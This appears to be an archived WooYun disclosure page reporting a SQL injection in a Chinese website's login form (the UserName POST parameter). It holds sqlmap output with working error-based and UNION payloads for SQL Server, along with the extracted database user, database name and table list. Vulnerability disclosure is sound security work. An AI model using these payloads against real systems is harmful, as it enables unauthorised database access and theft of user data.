乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-19: 细节已通知厂商并且等待厂商处理中 2015-09-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-01: 细节向核心白帽子及相关领域专家公开 2015-10-11: 细节向普通白帽子公开 2015-10-21: 细节向实习白帽子公开 2015-11-05: 细节向公众公开
。。。。。
地址:
http://**.**.**.**/passport/login.aspx
sqlmap identified the following injection point(s) with a total of 179 HTTP(s) requests:---Parameter: UserName (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwULLTE4NjcwMDk4OTkPZBYCZg9kFgICCQ8PFgIeBFRleHQFG+eUqOaIt+WQjeaIluWvhueggemUmeivr++8gWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBQxJbWFnZUJ1dHRvbjIEVuZ6bz00CeUvgNlfm9vRR0UL4g==&UserName=Hguh' AND 6522=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6522=6522) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'Burx'='Burx&UserPassword=&ImageButtonLogin.x=1&ImageButtonLogin.y=1&__EVENTVALIDATION=/wEWBQKcrYWyDAKvruq2CALIk7LNDgLz+OWrDgLSwtXkAqxteLMW5ZsMf3D2yysG5k8u+52m Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: __VIEWSTATE=/wEPDwULLTE4NjcwMDk4OTkPZBYCZg9kFgICCQ8PFgIeBFRleHQFG+eUqOaIt+WQjeaIluWvhueggemUmeivr++8gWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBQxJbWFnZUJ1dHRvbjIEVuZ6bz00CeUvgNlfm9vRR0UL4g==&UserName=Hguh' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(115)+CHAR(101)+CHAR(120)+CHAR(121)+CHAR(84)+CHAR(102)+CHAR(73)+CHAR(84)+CHAR(81)+CHAR(69)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &UserPassword=&ImageButtonLogin.x=1&ImageButtonLogin.y=1&__EVENTVALIDATION=/wEWBQKcrYWyDAKvruq2CALIk7LNDgLz+OWrDgLSwtXkAqxteLMW5ZsMf3D2yysG5k8u+52m---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000
当前用户名
current user: 'thsj'
当前数据库
current database: 'thsj_knowledge'
表段
Database: thsj_knowledge[134 tables]+---------------------------+| Agent || Article_Comment_Star || ChapterCategories || DV_ChanOrders || Department_New || Department_New || Dv_Admin || Dv_Appraise || Dv_Badlanguage || Dv_BbsLink || Dv_BbsNews || Dv_BestTopic || Dv_BoardPermission || Dv_BoardPermission || Dv_BookMark || Dv_ChallengeInfo || Dv_Friend || Dv_GroupName || Dv_GroupUser || Dv_Group_Board || Dv_Group_Class || Dv_Group_Topic || Dv_Group_bbs || Dv_Help || Dv_Log || Dv_MedalLog || Dv_MedalLog || Dv_Message || Dv_MoneyLog || Dv_Online || Dv_Plus_Tools_Buss || Dv_Plus_Tools_Buss || Dv_Plus_Tools_Info || Dv_Plus_Tools_MagicFace || Dv_Qcomic || Dv_Setup || Dv_SmallPaper || Dv_Space_skin || Dv_Space_user || Dv_StyleHelp || Dv_TableList || Dv_Templates || Dv_Topic || Dv_Upfile || Dv_UserAccess || Dv_UserGroups || Dv_User_old || Dv_User_old || Dv_Vote || Dv_VoteUser || Dv_banzhu_config || Dv_banzhu_log || Dv_banzhu_user || Dv_bbs1 || Dv_notdownload || Oblog_Verifiydata || TH_APermission || TH_ArticleCategories_Base || TH_ArticleCategories_Base || TH_Article_Base || TH_Article_Base || TH_BookCategories || TH_BookCategories || TH_BookLog || TH_BookType || TH_Comment || TH_Message || TH_PersonStyle || TH_Rss || TH_Start || TH_UpLoad || TH_helpCategories || TH_helpCategories || dtproperties || dv_address || dv_sql_log || oBlog_usertags || oblog_AlbumComment || oblog_AlbumComment || oblog_SpecialList || oblog_SpecialList || oblog_admin || oblog_arguelist || oblog_arguelist || oblog_blogstar || oblog_blogteam || oblog_calendar || oblog_comment || oblog_config || oblog_digg || oblog_friend || oblog_friendurl || oblog_groups || oblog_logclass || oblog_logclass || oblog_logvotes || oblog_message || oblog_myurl || oblog_notdownload || oblog_obcodes || oblog_pm || oblog_roles || oblog_setup || oblog_skinclass || oblog_subject || oblog_syslog || oblog_sysskin || oblog_tags || oblog_teampost || oblog_teampost || oblog_teamskin || oblog_teamusers || oblog_trackback || oblog_upfile || oblog_url || oblog_userclass || oblog_userclass || oblog_userdigg || oblog_userdir || oblog_userskin || sysconstraints || sysdiagrams || syssegments || thsj_user || thsj.ArticleSubscribe || thsj.Article_Book_Log || thsj.Book_Comment_Star || thsj.Book_Log || thsj.Suggests || thsj.TH_ArticleClass || thsj.TH_page || thsj.UserCV || thsj.view_SystemUser || thsj.view_oa_admin |+---------------------------+
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-09-21 16:01
暂未建立与网站管理单位的直接处置渠道,待认领.
暂无